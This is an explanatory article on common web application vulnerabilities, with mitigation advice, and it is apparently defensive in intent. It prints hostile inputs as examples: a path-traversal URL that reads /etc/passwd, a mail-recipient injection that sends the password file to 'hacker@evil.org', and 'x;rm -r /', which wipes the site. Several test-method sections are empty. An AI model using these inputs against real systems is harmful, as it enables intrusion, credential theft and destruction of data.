Hidden fields often are used to save information about the client's session, eliminating the need to maintain a complex database on the server side. A client does not normally see the hidden field and does not attempt to change it. However, modifying form fields is very simple. As an example, let's assume the price of a product is kept in a hidden field, and thus is trusted by any back-end system; a hacker can easily change it, and the invoked CGI will charge him/her for the new amount:

Failure to confirm the correctness of CGI parameters embedded inside a hyperlink can be easily used to break the site security. For example, let's take a search CGI that accepts a template parameter (Search.exe?template=result.html&q=security). By replacing the template parameter, a hacker can obtain access to any file he wants, such as /etc/passwd or the site's private key (Search.exe?template=/etc/passwd&q=security).

Many web applications use cookies in order to save information (user id, time stamp, etc.) on the client's machine. For example, when a user logs into many sites, a login CGI validates his user name and password and sets a cookie with his numerical identifier. When the user checks his preferences later, another CGI (say, preferences.asp) retrieves the cookie and displays the user information records of the corresponding user. Since cookies are not always cryptographically secure, a hacker can modify them by modifying the cookie file, thus fooling the application.

Precarious executions in the web server, such as "eval" and "system" Perl commands, server-side includes, and SQL queries, enable hackers to plant Trojan-horses in form submissions and run malicious or unauthorized code on the web server. Take a postcard site as an example. The user fills in a postcard sending form, including the recipient name. The site then emails the recipient with the postcard. The CGI used for this purpose was written in Perl, and it had the following statement in it: open (MAIL, "|$mailprog $recipient". It is easy to see how, by filling in the recipient field with "hacker@evil.org</etc/passwd," the hacker will be mailed the password file. Shell commands can be executed as well by sending "x;rm -r /", deleting the entire site.

Web servers will send any file to a user, as long as the user knows the file name and the file is not protected. Therefore, a hacker may exploit this security hole, and "jump" directly to pages. For example, :

Many applications contain code left for debugging purposes, and some even contain code left by disgruntled employees. In a certain site, parameter tampering with the session token produced a page saying "we lost you, please re-login." That page presented a link for re-login which actually was a debug option. It logged in the hacker with no password required — furthermore, it logged in the hacker as the site's QA person.

Misconfiguring web servers and application servers is a very common mistake. The most common misconfiguration is one that permits directory browsing. Hackers can utilize this feature in order to browse the application's directories (such as cgi-bin/) by simply typing in the directory name. Or, in the case of a misconfigured ColdFusion application server, accessing /CFIDE/administrator/index.cfm will invoke an administrator console without requiring a password.

Because product vulnerabilities are published quickly over the web today, and because installing the latest vendor patch usually is not a high-priority issue, it almost always is possible to exploit vulnerable products.

Test Method:

Interpreting the Results:

Test Method:

Example:

Interpreting the Results:

Test Method:

Interpreting the Results:

Designing application functionality with security in mind leads to a more complex application and extends development time. In addition, designing a secured application requires specific expertise.

A more complex design also complicates implementation. Implementing a secured application requires the use of defensive coding, i.e. embedding checks and balances, to make sure an implementation error will not cause a security hazard. Some application servers can provide limited assistance in this area.

Other than functionality testing, an entirely new category of stress testing needs to be implemented. The application should be placed in hostile environments and attacked with various tests and inputs designed to expose its loopholes.

Careful attention to detail is crucial in this stage, as the configuration of each component should be checked and verified to disallow any exploit. This includes web servers, application servers, public-domain CGIs and of course, internally developed code. For example, the site administrators should configure vendor software to turn off any unsafe features, set correct permissions on every file that is accessible by the web servers, remove debug and QA features from production environment and remove default examples. When using hardened web servers, secure configuration is easier to achieve than with normal web servers.

Every time a vendor or a public-domain CGI developer announces a fix for a vulnerability found, the patch should promptly be applied to the entire site. It is very hard to keep pace with the rate of the fixes, especially for large, complex sites.

Educating developers, testers, site administrators and external consultants to understand and master application security is a daunting task. You will always have some novice people who are bound to make mistakes.

If you happen to use a public-domain code in your application, then a code review to ensure its security properties is needed. If you are really into security, then backdoors left by your own programmers will be a real issue for you. The only way to erect those backdoors is to have a third-party advisor review all your code.